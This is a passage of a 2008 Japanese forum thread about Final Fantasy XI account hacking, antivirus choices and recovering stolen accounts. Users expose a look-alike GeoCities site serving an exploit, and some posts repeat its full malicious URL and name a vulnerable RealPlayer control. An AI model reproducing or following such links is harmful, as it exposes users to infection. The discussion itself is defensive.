391既にその名前は使われています:2008/09/13(土) 14:13:43 ID:4FkV9d2y
>>386
どれくらいの量のソフトを常駐させておみえなのかわかりませんが
セキュリティ関係では6個常駐させていてコンクリフトの経験はありません
(セキュリティ以外にもいくつか常駐してます)
392既にその名前は使われています:2008/09/13(土) 16:07:13 ID:s2i1cQYz
age
393既にその名前は使われています:2008/09/13(土) 17:14:25 ID:mVnHsvAK
>>391
なにを併存させてるのかkwsk
394既にその名前は使われています:2008/09/13(土) 18:44:46 ID:OQfetrhO
やはりここはこれを貼るしか無かろう。

漏れはノートン、バスター、NOD32、Bitdefender,AVAST!常駐最強(´・ω・)ス

最初にバスターを入れれば複数いける(´・ω・)ス
普段は不具合ないけどウィルス発見したときすごいことになる(´・ω・)ス
ソフト同士で取り合いを起こす(´・ω・)ス
ノートン「とったどー! 隔離する(´・ω・)ス!」
バスター「(ノートンの隔離フォルダから)とったどー! 隔離する(´・ω・)ス!」
ノートン「(バスターの隔離フォルダから)また見つけたどー!」

って繰り返す(´・ω・)ス
テラバカ(´・ω・)ス

あとむちゃくちゃ重くなるから常用は無理(´・ω・)ス
395既にその名前は使われています:2008/09/13(土) 18:53:53 ID:dgWR6L9Z
>>394
それ初出いつだっけ、2年前?懐かしいのう
396既にその名前は使われています:2008/09/13(土) 18:57:22 ID:QPMUd2O4
山田ヲチスレっ(´・ω・) スカ
397既にその名前は使われています:2008/09/13(土) 19:03:44 ID:4FkV9d2y
>>393
一般的なものだけしか入れてませんけど・・・

んと、NIS2008・Spybot・Unleak・PG2・Windows defender・PSI
FF用PCとネット用PC、どちらも同じです
398393:2008/09/13(土) 19:07:13 ID:4FkV9d2y
Spyware Blasterは常駐じゃなかったと思うので除きました
399397:2008/09/13(土) 19:08:20 ID:4FkV9d2y
397だろおぃ>わたし
400既にその名前は使われています:2008/09/13(土) 19:18:01 ID:QPMUd2O4
カスペとノートン併存させたい
401既にその名前は使われています:2008/09/13(土) 20:53:49 ID:s2i1cQYz
mage
402既にその名前は使われています:2008/09/13(土) 21:20:04 ID:t1QzSPkj
山田ヲチスレ見てたなぁ、ダウソ板住人ではないがあれだけは楽しかったw
403既にその名前は使われています:2008/09/13(土) 22:07:04 ID:qCglIX7j
>>402
人の不幸は蜜の味、ですね。分かります。
404既にその名前は使われています:2008/09/13(土) 22:21:19 ID:t1QzSPkj
うむ
ジョブ板の暗黒スレに突撃したりとかな・・・w
405既にその名前は使われています:2008/09/13(土) 23:38:29 ID:4FkV9d2y
232からあげ
406既にその名前は使われています:2008/09/13(土) 23:45:37 ID:tl+y3k8G
407既にその名前は使われています:2008/09/14(日) 00:38:37 ID:IyMbqSxr
おやすみ前のあげ。
408既にその名前は使われています:2008/09/14(日) 01:36:59 ID:hIiFn3Kn
>>327
レスありがとう。
全部のサイトでは無いけどやはり気になってしまう(´・ω・`)
409既にその名前は使われています:2008/09/14(日) 02:26:49 ID:gXM0WY+j
ほしゅして寝る
410既にその名前は使われています:2008/09/14(日) 03:18:13 ID:OWK9aplb
>>313
その動画の番号教えて。みてみたい。
411既にその名前は使われています:2008/09/14(日) 03:59:42 ID:CZe0gGnX
いきなりスレ数が170とかになってて焦った
ほしゅほしゅ
412既にその名前は使われています:2008/09/14(日) 04:18:01 ID:ydT79994
かすぺる入れてFF11やりはじめたんだけど
C:\Program Files\PlayOnline\SquareEnix\PlayOnlineViewer\pol.exe
でkeylogger警告してくるんだけど
これは許可だしちゃっていいのかな?
413既にその名前は使われています:2008/09/14(日) 06:10:26 ID:VguciVYr
>>412
それはいいよ許可して

そして別のセキュリティソフトに変えるといいよ
414既にその名前は使われています:2008/09/14(日) 07:05:19 ID:hmVnTC4f
セキュリティソフトとしてマカフィーの評価はどう?

デスクは360だが、ノートが360入れるとエラー多くて
デフォで入ってたマカフィー使ってるんだ。



保守揚げ
415既にその名前は使われています:2008/09/14(日) 07:14:00 ID:MozNiAjf
しばらく休止または引退していて復帰した浦島太郎ほど、垢ハックされやすい。
今のこの状況を知らないため、復帰したフレがいたらまず垢ハックのことを教えてやるべき。
416既にその名前は使われています:2008/09/14(日) 09:04:57 ID:fb7zNgqE
保守

新型には気をつけよう。
417既にその名前は使われています:2008/09/14(日) 09:19:29 ID:KyVXeDfj
最近報告少ないな   ちっとは沈静化したのだろうか
418既にその名前は使われています:2008/09/14(日) 09:20:41 ID:NUP/i1aL
んなことはない。
久々にフレからtellがきて、「垢ハックされてた;;」報告とかあるし。
419既にその名前は使われています:2008/09/14(日) 09:24:26 ID:nJpLIqr2
>>397
普通こういうスレで併用が問題になるのは
>>394のコピペみたいに同じ系統(コピペの場合はウィルスに対する常駐保護)のソフトを複数同時に動かしたときのことだよ。
>>397のはそれぞれがやってる処理がほとんどかぶってないから問題が起きないんじゃないかな。

まあそもそもの始まりの>>386は、
導入してもゲーム中OFFにしちゃうやつもいるのかなぁ、っていう程度の想像の話しみたいけどな。
420既にその名前は使われています:2008/09/14(日) 10:02:06 ID:VguciVYr
俺の周りでは一部機能をOFFするてのを聞いた
あれはその類かもしれないなぁ一部OFFって言ってたから多少は理解している人間だろうけど
421既にその名前は使われています:2008/09/14(日) 10:04:17 ID:I6YtxuzT
知識がないヤツは金を使え、金がないヤツは知識を使え。
両方無いヤツは勉強して知識を身につけろ。
422既にその名前は使われています:2008/09/14(日) 11:12:44 ID:UIVsQJkY
レジストリエディタでwzcsvbxm.dllが見つかった場合は
OS毎クリーンインストールしなきゃダメなんですかね?
423既にその名前は使われています:2008/09/14(日) 11:31:27 ID:xlwoS+MD
また検索履歴か
424既にその名前は使われています:2008/09/14(日) 12:01:32 ID:doq0d6fN
昼飯前にage
425既にその名前は使われています:2008/09/14(日) 13:39:44 ID:isA2NaFx
POLID登録時未成年だったので年齢詐称

8/17 垢ハック
8/17 凍結
8/18 復旧依頼&書類郵送
8/20 書類受理→データと違うので復旧できませんとメール
8/21 サポセンを問い詰める→本人確認できたので引き続き復旧します
9/14 巻き戻し完了メール

パス変更、復旧以来のときにも生年月日のことを聞かれててGMの方が訂正しときます的なことを
言ってたのですが、訂正されてなくてちょっと困ったぜ


426既にその名前は使われています:2008/09/14(日) 14:08:07 ID:0O4gWDXB
やっと復旧完了メールきたああああああ!!!!
日曜に来るとは想定外だったぜ!
427既にその名前は使われています:2008/09/14(日) 14:15:23 ID:OOrf5cp+
>>426
       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \  派遣だから3連休なのに休み無しで頑張ってるお
  |     (__人__)    |  
  \     ` ⌒´     /
428既にその名前は使われています:2008/09/14(日) 14:45:56 ID:NdxGiopy
ありゃ、巻き戻し報告スレ落ちちゃったか・・・
429既にその名前は使われています:2008/09/14(日) 16:31:17 ID:UIVsQJkY
422で書き込みしたものですが
最近POL起動してインしようとすると2回ほど強制終了して
その後インできるんですが、これは危険ですよね?
430既にその名前は使われています:2008/09/14(日) 16:33:51 ID:yOpBXy2w
きけんだよー
431既にその名前は使われています:2008/09/14(日) 16:34:14 ID:H034iIa3
>>429
それなら最初からそう書くべし。422のレス内容だけじゃ端的すぎて
何もアドバイスできないよ。
恐らく感染してもうパスも中華に握られてるだろうから。
安全なハードからパス変更するかGMに頼んで垢凍結してもらってから
クリーンインストール推奨。
432既にその名前は使われています:2008/09/14(日) 16:44:44 ID:UIVsQJkY
なるほど。
OSをクリーンインストールしてその後パス変えるとかじゃダメかな?
今はインできてるもんで。
433既にその名前は使われています:2008/09/14(日) 16:46:21 ID:doq0d6fN
インしてる状態ならPS2とかのリアフレとかにパス変更をお願いするのがえぇんじゃないか?
クリーンインスコしてからじゃ間に合わないかも
434既にその名前は使われています:2008/09/14(日) 16:46:59 ID:H034iIa3
>>432
クリンスコ>各種ドライバインスコ>FFインスコ>パッチDLの間に
ハックされる可能性があることを認識した上でNGかOKかは自分で判断しる
435既にその名前は使われています:2008/09/14(日) 16:59:48 ID:UIVsQJkY
勉強になるます
んでは垢凍結してもらい、>>434の作業していけば安全なんですな

つかどっから潜り込んだんだ・・
436既にその名前は使われています:2008/09/14(日) 17:01:35 ID:yvY+UhpV
ギアス実況はじまったから保守
437既にその名前は使われています:2008/09/14(日) 18:12:48 ID:iL/a2PPU
>425
POLは未成年でも「親権者の承諾をとってプレイする本人の名義で契約しろ」って
マニュアルにも書いてあるんだが。Q&Aにもあったかな。
カード支払いも、カード名義人と契約者別でできる。
マニュアルとか全く読まずに勝手に行動する人なんだろうね。
そんでサポセン問い詰めるとかバカなの?
438既にその名前は使われています:2008/09/14(日) 18:50:14 ID:H0KSdHqI
落ちすぎだろ
439既にその名前は使われています:2008/09/14(日) 18:51:49 ID:H034iIa3
>>435
感染してたってことはセキュリティが甘いってことだから、
クリンスコしたら無料の体験版でもいいからアンチウイルスソフト導入しなよ
440既にその名前は使われています:2008/09/14(日) 20:51:27 ID:RmCtMMQW
ageなきゃいけない!
441既にその名前は使われています:2008/09/14(日) 23:09:22 ID:mZgdUS4q
age
442既にその名前は使われています:2008/09/14(日) 23:12:21 ID:O2PWbSoI
ほんとピーク時に比べたら、のびなくなったなー

今のところは沈静してるのかねー
443既にその名前は使われています:2008/09/15(月) 00:01:14 ID:6x2yv8jo
Flash対策している人にとっては落ち着いた状況と言っていいとは思うけどね
こうなると次のがきそうだから全然安心はできないけどさw
444既にその名前は使われています:2008/09/15(月) 00:10:54 ID:pnU3SrDm
寝る前にage
このまま沈静化するといいのにね〜
445既にその名前は使われています:2008/09/15(月) 00:18:52 ID:G0PQciXA
>>433
6月、8月ときたから10月あたりに
本命は正月休み前がかなり危ないと思われ
446既にその名前は使われています:2008/09/15(月) 00:36:07 ID:iq7PCban
IQ7のPCはもれなくBAN
447既にその名前は使われています:2008/09/15(月) 00:47:43 ID:OZp+lgoq
垢ハックされた場合、大体ワールド変えられてるから3000円負担しなきゃ
いけないって知ってた?
448既にその名前は使われています:2008/09/15(月) 00:48:54 ID:4w67+cK9
そりゃこれだけ騒がれてるのに
自分だけは大丈夫とおもってるカード支払い組みだろ
449既にその名前は使われています:2008/09/15(月) 00:53:59 ID:OZp+lgoq
カードだろうが、何だろうが請求されるんだよ。
翌月払えって。
450既にその名前は使われています:2008/09/15(月) 01:39:16 ID:JzfsNQxk
FFでクレカとか激やばだろw
近いうちに主要カード会社とか抜けるくらいの勢いだろこれ
451既にその名前は使われています:2008/09/15(月) 01:40:02 ID:HLV9QG74
おやすみ前のあげ。
452既にその名前は使われています:2008/09/15(月) 02:20:55 ID:h4eDAp78
age
453既にその名前は使われています:2008/09/15(月) 02:28:18 ID:Ba54bD5V
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
 不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!

※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。

警視庁サイバー対策室
http://www.npa.go.jp/cyber/

各都道府県警では既に不正アクセスに関する専門の対策室ができております
泣き寝入りは絶対ダメ!お気軽にご相談を。
http://www.npa.go.jp/cyber/localpolice/index.html
454既にその名前は使われています:2008/09/15(月) 03:10:12 ID:h4eDAp78
age
455既にその名前は使われています:2008/09/15(月) 05:43:47 ID:6xVaA7/W
あげ
456既にその名前は使われています:2008/09/15(月) 07:22:26 ID:OZp+lgoq
>>450
クレジットカードの情報はアカウント情報とは別物。
それが抜けたらカード会社が危ういだろうな。

逆にクレジットカードなど、本人確認が取れないとアカウントが取得
できない仕組みにしたほうが良い。業者が仮アカウントを取得できないように。

>>454
外人相手にどこまで有効なんだか。。。

中国はアク禁かつサービス終了にしたほうが良いだろな。
457既にその名前は使われています:2008/09/15(月) 08:22:42 ID:YNwF0icz
>>450
それ言ったらインターネットでクレカとか、アルバイトの店員のいる店でクレカの方がよっぽどヤバい。

それに普通はクレカが不正使用された場合クレカ会社が負担する。
FF11の場合が該当するかどうかは微妙な気がするが。
458既にその名前は使われています:2008/09/15(月) 10:03:54 ID:OZp+lgoq
Tr●jan-GameThief.Win32.OnLineGames.taru
に感染してた。これ新しいよね。
パターン出て間もなくスキャンも出来てないときや、パターン出る前に感染した
としても、被害者にユーザIDとパスワードの管理が行き届いてないから、
移転費などはご負担下さいって姿勢はどうなのかな。
長い眼で見たら大きなマイナスになると思うけど。
被害者の立場にたって考えてほしい。
459既にその名前は使われています:2008/09/15(月) 10:21:24 ID:16opgDNs
>>458
被害者の立場に立ったらコスト上がって困るじゃないですか^^;

実際ここ最近のユーザーフレンドリィなver.upって根幹には
サービス開始6年目ってのも大きいだろうけれど課金者が減ってしまったからだろう。

スクエニの運営スタイルからすると問題が大きくなってから対処すればいい、ッてのは
オフゲに於いてもゲーム進行が止まる様なバグがあっても回収しない事があるのを見ると
よく分かると思うので、もっと被害者が増えないと何も変わらないと思う。

少なくとも和田社長は株式会社の社長の鏡の様に株主の言う事は絶対、ッて人だから
株主が守銭奴であるせいだ、とも言えると思う。

最も和田社長だからこそ守銭奴的な株主が増えたのだと思うけれど。
460既にその名前は使われています:2008/09/15(月) 11:02:57 ID:obvUZ7hi
tp://marimo●s137●xrea●com/r.cgi/ff11/maptool

さっき間違えて踏んでしまったんだがここってやばかったんだっけ?
FireFox+NoScript+PGなんだが
461既にその名前は使われています:2008/09/15(月) 11:42:00 ID:8pDXPvDY
>>458
既出。XREAトロイの17世代目。
先月31日製造、同日各社に提出済み。
ttp://www.virustotal.com/analisis/b5f8fdfcde0e42a1346bf092ada24d27
462既にその名前は使われています:2008/09/15(月) 11:43:42 ID:8pDXPvDY
>>460
そのページには何もない。鑑定は他所でどうぞ。

ネットワーク
http://pc11.2ch.net/hack/
勇気がなくて踏めない人のための鑑定スレPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/
463既にその名前は使われています:2008/09/15(月) 12:04:13 ID:jqfBYEy/
オンラインゲーム=RMTプレイメイン
が一番いいという風に育てた世代だろうしなぁ
よくある話というか・・・
464既にその名前は使われています:2008/09/15(月) 12:06:07 ID:OZp+lgoq
>>459
今は20万ユーザくらいなのかな?
年間48億くらい?
コスト減できるような対策ツールの充実が急務では。
次に繋げる為にも、セキュリティ面での落度は致命的。
465既にその名前は使われています:2008/09/15(月) 12:44:27 ID:EjFoK+ZS
延々と続いてるハック問題に強い事言える監査組織が無いのが問題
緑川さん立ち上げてくださいおながいします
466既にその名前は使われています:2008/09/15(月) 13:14:01 ID:8pDXPvDY
まずソースネクストみたいなザルを発禁にしてくれ
467既にその名前は使われています:2008/09/15(月) 14:14:15 ID:g2XolT8h
>>460
感染する仕組みをちゃんと理解しておくことが必要ですね
468既にその名前は使われています:2008/09/15(月) 16:24:30 ID:8pDXPvDY
とりあえずage
469既にその名前は使われています:2008/09/15(月) 18:02:57 ID:bJLcsSba
あげ
470既にその名前は使われています:2008/09/15(月) 19:49:21 ID:3YCCFRFY
巻き戻し対応遅すぎ。
471既にその名前は使われています:2008/09/15(月) 20:43:21 ID:djf5rwaD
あげ
472既にその名前は使われています:2008/09/15(月) 22:24:39 ID:Yuxb5Grn
278からの急上昇
473既にその名前は使われています:2008/09/15(月) 23:01:23 ID:OWrRGEdy
腰痛がひどい
474既にその名前は使われています:2008/09/15(月) 23:36:43 ID:HLV9QG74
おやすみ前のあげ。
475既にその名前は使われています:2008/09/16(火) 00:10:49 ID:60f40Z51
オヤスミのあげ
476既にその名前は使われています:2008/09/16(火) 01:45:25 ID:MXdIBTfY
おやすみ
477既にその名前は使われています:2008/09/16(火) 02:36:12 ID:xYBz+wAQ
巻き戻し報告スレが落ちちゃったので、
一応まだ復旧されてない方へのご参考までに報告します。
8/31不正アクセス
8/31垢凍結
9/1 チャットサポートでPW再発行→キャラ確認※身包み剥がされてました
9/1 キャラデータ復元依頼と公的書類送付
9/15キャラデータ復元
備考:レベは1、2ヶ月分くらい巻き戻ってました。
アイテムについてはエクレアでも戻ってこなかったものがありました。
478既にその名前は使われています:2008/09/16(火) 05:41:53 ID:wuQM/6PG
200からあげ
479既にその名前は使われています:2008/09/16(火) 08:19:25 ID:uea+W7Wz
IPアドレスからサーバー所在地調べてくれるサイトってどこだっけ?
480既にその名前は使われています:2008/09/16(火) 08:25:44 ID:DQv/X8Z7
どこだっけ じゃなくて どこでしょうか、教えていただけませんか? だろ。

社会人になって勉強して来いあほニート
481既にその名前は使われています:2008/09/16(火) 08:26:03 ID:38dI1GeH
JP NICとかInter NIC?それともwww.aguse.jpの方かな?
482既にその名前は使われています:2008/09/16(火) 10:32:00 ID:7yHOD3e0
>>480のほうが無礼に見える件。
483既にその名前は使われています:2008/09/16(火) 13:35:19 ID:DeEPkQuf
258からあげくん
484既にその名前は使われています:2008/09/16(火) 13:46:12 ID:AIGhpq8c
IPひろば使ってたぜ
485既にその名前は使われています:2008/09/16(火) 15:30:37 ID:+2UuDuJD
200さるべーじ
486既にその名前は使われています:2008/09/16(火) 17:23:33 ID:yohkazVm
あげ
487既にその名前は使われています:2008/09/16(火) 17:28:15 ID:5raphCCB
>>477
時系列がほぼ同じだw
まだ復旧連絡はまだ着ていないけど。
488既にその名前は使われています:2008/09/16(火) 17:37:11 ID:h97MwBUn
>>477
それってもしかして
被害確認以前にアクセスあったのかもよ
俺の場合不正直前ぽかった
489既にその名前は使われています:2008/09/16(火) 17:43:03 ID:j0LmKQv/
パス抜かれて業者に課金されてたの見つけた
こわいな
http://www.nicovideo.jp/watch/sm4573634
490既にその名前は使われています:2008/09/16(火) 19:02:11 ID:WZfcViO0
age
491既にその名前は使われています:2008/09/16(火) 20:09:28 ID:MXdIBTfY
数日前からPG2のリスト
http://peerguardian○sourceforge○net/lists/spy○phpとかが
URL接続エラーで更新できないんだけど
なんでかな
492既にその名前は使われています:2008/09/16(火) 20:30:41 ID:+2UuDuJD
>>491
公式のリストは結構エラー出るよ
ただ俺は使ってないから今回もそれが原因なのかは分からんけど
493既にその名前は使われています:2008/09/16(火) 20:52:39 ID:GJf0jDtU
本人確認と不正アクセスの事実が把握できたなら、すぐに復元してくれれば
良いのに。
時間かかりすぎ。
494既にその名前は使われています:2008/09/16(火) 21:07:05 ID:XYusCqmS
オンラインゲームもしょせん、RMTツールでしかないからな

つ記事:オンラインゲームはRMTの宝庫
495既にその名前は使われています:2008/09/16(火) 21:10:06 ID:MyHJ6T2X
×ハック
○クラック

細かいが
496既にその名前は使われています:2008/09/16(火) 21:29:41 ID:+2UuDuJD
NoScriptきてるぞー
497既にその名前は使われています:2008/09/16(火) 21:49:35 ID:YMSBRtF0
>>493
認証担当が毎週火曜日だけの出社だから無理
498既にその名前は使われています:2008/09/16(火) 21:52:59 ID:GJf0jDtU
>>497
そうなの?
ひどいな、それ。
499既にその名前は使われています:2008/09/16(火) 21:56:17 ID:h97MwBUn
>>497
どこ情報だよw
500既にその名前は使われています:2008/09/17(水) 00:02:31 ID:DeEPkQuf
あげまふ。起きたら落ちてそうなヤカン
501491:2008/09/17(水) 00:07:47 ID:XMwhEY3y
>>492
そなのかあ
ありがとう
しばらく様子見てみますage
502既にその名前は使われています:2008/09/17(水) 00:08:11 ID:XMwhEY3y
あげてなかったage
503既にその名前は使われています:2008/09/17(水) 00:14:24 ID:VmtHz319
おやすみ前のあげ。
504既にその名前は使われています:2008/09/17(水) 00:19:43 ID:ZA1hWmTn
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1 アップデート
505既にその名前は使われています:2008/09/17(水) 01:49:43 ID:PkKZ+Fpy
あげ
506既にその名前は使われています:2008/09/17(水) 01:57:07 ID:EOzNtDCb
>>504
更新した
ありがとん
507既にその名前は使われています:2008/09/17(水) 02:40:57 ID:ZA1hWmTn
しゅ
508既にその名前は使われています:2008/09/17(水) 03:41:10 ID:ZA1hWmTn
しゅしゅ
509既にその名前は使われています:2008/09/17(水) 03:50:14 ID:5AzQPvbp
さっき、他スレで「FF11ヴァナ・ディール菜園」を踏んだらavastがマルウェアを見つけた
敢えてURLを張らないけど気を付けてね
只今カスペオンラインスキャン中
510既にその名前は使われています:2008/09/17(水) 04:03:53 ID:rkqJGY7W
>>509
カスペじゃ異常検知しないね。
誤検知かもしれないし、Avast!も最近飛躍的に検知率がよくなってるから
ひょっとしてAvast!の方が正いのかもしれない。

ところでAvast!が見つけたマルウェアの名前はなんですか?
511既にその名前は使われています:2008/09/17(水) 04:04:25 ID:RNuwTKwE
>>509
見てきたがそれらしいスクリプトはないぞ?
見つけたマルウェアは何?
512既にその名前は使われています:2008/09/17(水) 04:10:15 ID:5AzQPvbp
こんなの
"JS:Agent-AU [Expl]"
"http://www.geocities.jp/ff11seeds/Atlas/re11.htm\unp238426583"

ちなみにここ
グラがかっこいいと思う装備
http://changi.2ch.net/test/read.cgi/ogame/1221573964/91

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
http://www.geocities.jp/ff11seeds/index.html

513既にその名前は使われています:2008/09/17(水) 04:10:36 ID:ZA1hWmTn
危ないスクリプト、見つかりませんね<FF11ヴァナ・ディール菜園
スクリプトはいくつか入ってますけど、問題ないスクリプトしか
見当たりません
514既にその名前は使われています:2008/09/17(水) 04:13:22 ID:5AzQPvbp
もしかして俺の勘違い?
俺の恥で済むからかまわないけど
515既にその名前は使われています:2008/09/17(水) 04:15:47 ID:RNuwTKwE
どっちにしても直リンはやめれ
516既にその名前は使われています:2008/09/17(水) 04:16:17 ID:EVmfXFVx
脈絡もなしに菜園URLとか張ってるのはちょっと怪しいけどなあ
517既にその名前は使われています:2008/09/17(水) 04:16:35 ID:5AzQPvbp
あ、やっぱまずかった?
削除依頼って通じるかな?
518既にその名前は使われています:2008/09/17(水) 04:17:25 ID:ZA1hWmTn
>>512のリンク、先生が攻撃拒否しました

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
ttp://www●geocities.jp/ff11seeds/index●html

このURLでなにか引っかかってます
519既にその名前は使われています:2008/09/17(水) 04:21:33 ID:5AzQPvbp
削除依頼って何処でお願いしたら良いんでしょう?
何分初めてなものでして
520既にその名前は使われています:2008/09/17(水) 04:23:56 ID:ZA1hWmTn
おかしいな・・・

geocities.jpからの侵入攻撃って、なんだろ・・・
202●93.87.154 ← 普通にヤフーのIPだし
521既にその名前は使われています:2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ

VBS:Malware-gen
ウイルス/ワーム
080915-0, 2008/09/15

JS:Agent-AU [Expl]
Exploit
080915-0, 2008/09/15
522既にその名前は使われています:2008/09/17(水) 04:30:04 ID:uz4igdJy
『栽培サイト:FF11ヴァナ・ディール菜園』
ここウィルス警報発令ですか?
523既にその名前は使われています:2008/09/17(水) 04:31:59 ID:ZA1hWmTn
ttp://www●geocities.jp/ff11seed/ ← ヤフー検索で出たURL(とくに問題なし)

ttp://www●geocities.jp/ff11seeds/index●html ← >>512の出したURL(先生が侵入感知)

これって、なんだろ・・・

真似た罠サイト?とかだったりする?
524既にその名前は使われています:2008/09/17(水) 04:34:55 ID:8dOBeT1H
また一段とずる賢くなったな
525既にその名前は使われています:2008/09/17(水) 04:36:35 ID:rkqJGY7W
re11.htmのスクリプトちゃんと読んでないけど、 fuckyoukaspersky とか書いてるから超怪しい。

後、このページに含まれてる

clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

これはRealPlayerで、脆弱性がある。
リアルプレイヤーを入れてなければ害はないはずだけど。
526既にその名前は使われています:2008/09/17(水) 04:40:19 ID:ZA1hWmTn
>>521
踏んだのは seeeds/indexのほうですよね?
seedのほうはスクリプト数4個で、seedsのほうは20個もある
527既にその名前は使われています:2008/09/17(水) 04:41:24 ID:QceLOnyf
しょこたんがノートンファイターと競演――ノートン 2009イベント
http://itpro.nikkeibp.co.jp/article/NEWS/20080916/314936/

なんでこんな変なイベントするんだろう・・・
528既にその名前は使われています:2008/09/17(水) 04:41:25 ID:uz4igdJy
ファッキューですとw
529既にその名前は使われています:2008/09/17(水) 04:44:38 ID:RNuwTKwE
菜園はttp://www●geocities●jp/ff11seed/index●htmlが正しいはず

つまりseedsは偽装HPてことかね
530既にその名前は使われています:2008/09/17(水) 04:46:18 ID:5AzQPvbp
一応元のもここのも削除依頼してきた
こんなんで削除してくれるのかしらないけど
531既にその名前は使われています:2008/09/17(水) 04:50:46 ID:5N8y1SS0
>>526
踏んだの512のリンクのやつね
avastだと逃してるのあるのか・・
532既にその名前は使われています:2008/09/17(水) 04:54:13 ID:rkqJGY7W
今seed(本物)とseeds(偽者)のindex.htmを比較してみたけど、完全に偽サイトだね。

リンク先とかは偽者から本物のデータを参照するようにしてるから、
本家が更新されたら偽者も一緒に更新されるっていう・・・。
533既にその名前は使われています:2008/09/17(水) 04:55:37 ID:vl3qytsv
ogame:ネトゲ実況[レス削除]
http://qb5.2ch.net/test/read.cgi/saku/1161186446/l50
重要削除のほうじゃなくてこっちだね
ウイルスサイトへのリンクの削除は
534既にその名前は使われています:2008/09/17(水) 04:57:10 ID:RNuwTKwE
カードとかの番号引き出す成り済ましサイトと同じ要領だな

サイトアドバイザーとか入れてると少しはましかね
535既にその名前は使われています:2008/09/17(水) 04:57:27 ID:rkqJGY7W
削除依頼もだけど、元の書き込みした奴が犯罪者なのは明白だよね。警察に捜査依頼すべき?
536既にその名前は使われています:2008/09/17(水) 04:58:32 ID:uz4igdJy
>>532
手が込んでるね…
537既にその名前は使われています:2008/09/17(水) 04:58:53 ID:ZA1hWmTn
>>531
ありがとうございます

どうやら偽者サイトのようですね
これ、ジオに削除依頼を出しておいたほうがいいでしょうか
というか、どなたか出されました?
538既にその名前は使われています:2008/09/17(水) 05:00:08 ID:vl3qytsv
>>535
しておいたほうがいいかもね〜

どうでもいい話なんだが
ウイルスサイトアドレスを唐突に書き込むやつって、大抵串使ってるからbooに突っ込んで食ってるんだけど
>>512で出てたやつ突っ込んでみたが串じゃない返答だったw
539既にその名前は使われています:2008/09/17(水) 05:00:28 ID:RNuwTKwE
夏休みぐらいに自分が引っかかったからて色々なスレにアド貼り付けてたアホがいたな

まあ、サイバー(ryに通報しとけば厨房か業者か知らんが足がつくかもね
540既にその名前は使われています:2008/09/17(水) 05:00:34 ID:wHdZjOl6
geocities.jpに削除依頼した方がいいのかもね
541既にその名前は使われています:2008/09/17(水) 05:00:41 ID:5AzQPvbp
>>533
d
そっちにも依頼しておいた

>>537
出してない
542既にその名前は使われています:2008/09/17(水) 05:03:19 ID:rkqJGY7W
ちなみに、/seedsの判定は
McAfee SiteAdviser → 安全表示
Google Safe Browsing API → 安全表示
Finjan → 怪しい表示
Norton → (Windows版しかないから怖くて試せない)

マカフィーせめて「不明」と出せよなw
ちなみにFinjanは経験的に怪しいサイトはほぼ怪しいとでるが、普通のメジャーなサイトも
怪しいと出ることが多い。日本のIT Mediaとか。
543既にその名前は使われています:2008/09/17(水) 05:04:59 ID:ZA1hWmTn
>>542
参考になるかどうかわかりませんけど、侵入検知で弾いたわたしの
ソフトは、NIS2008でした
544既にその名前は使われています:2008/09/17(水) 05:19:12 ID:ZA1hWmTn
ジオ、どこに連絡すればいいのかわかんない・・・
こういうことはわかりやすいところに連絡先を書いておいて欲しいな・・・
545既にその名前は使われています:2008/09/17(水) 05:28:17 ID:EVmfXFVx
ttp://help.yahoo.co.jp/help/jp/geo/abuse/abuse-06.html

ここでいいんじゃないかな>連絡先
546既にその名前は使われています:2008/09/17(水) 05:28:33 ID:bB1v+35I
seedsの方は検索してもトップには出てこないな
最近栽培関連のスレ伸びてたから心配だ
と言うか、どこからそのサイトを見つけてきたの?
547既にその名前は使われています:2008/09/17(水) 05:31:43 ID:EVmfXFVx
12. 他人になりすましてサイトを立ち上げること、または他人が立ち上げているサイトを模倣したサイトを掲載すること
13. ページに接続したコンピュータやネットワークに損害を与える行為
( これには以下のものが含まれますが、この限りではありません)
・ ブラウザ・クラッシャーの設置
・ ウイルスやワームプログラム、またはプログラムコードの公開
・ ウイルスやワームプログラムに感染したファイルを故意に設置すること



思いっ切りジオシティーズガイドラインに触れてるから、まあ対処してくれるんじゃないかな
548既にその名前は使われています:2008/09/17(水) 05:32:21 ID:5AzQPvbp
549既にその名前は使われています:2008/09/17(水) 05:38:46 ID:ZA1hWmTn
>>545
>>548
ありがとうございます
とりあえずわたしも通報を入れておきました

さて・・・

攻撃を弾いたので大丈夫だとは思うけど、とりあえずスキャンしておこう・・・
550既にその名前は使われています:2008/09/17(水) 05:47:08 ID:5AzQPvbp
礼には及ばん
俺の場合は身から出た錆っつーのもあるからw
551既にその名前は使われています:2008/09/17(水) 05:49:10 ID:nEIJ3oAB


91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
http://www.geocities.jp/ff11seeds/index.html
552既にその名前は使われています:2008/09/17(水) 05:51:06 ID:fNtF/dEP
<<551
死ね
553既にその名前は使われています:2008/09/17(水) 05:51:44 ID:3ec2gQpW
>>551
これなに?踏んだらまずい?
554既にその名前は使われています:2008/09/17(水) 05:52:23 ID:EVmfXFVx
ちょっと上のレスくらい読みなさい
555既にその名前は使われています:2008/09/17(水) 05:57:47 ID:ZA1hWmTn
※※注意喚起※※

「FF11ヴァナ・ディール菜園」に本物そっくりの偽物サイトがあります

本物のURL = ttp://www●geocities.jp/ff11seed/
偽物のURL = ttp://www●geocities.jp/ff11seeds/

偽物はseedに「s」が付いてます

ジオには削除依頼を出していますが、偽物を踏むとウィルスが落ちてきますので
くれぐれも踏まないように注意してください
556既にその名前は使われています:2008/09/17(水) 06:00:09 ID:3ec2gQpW
何のウイルスかは分からんのですか
557既にその名前は使われています:2008/09/17(水) 06:03:11 ID:ZA1hWmTn
>>556

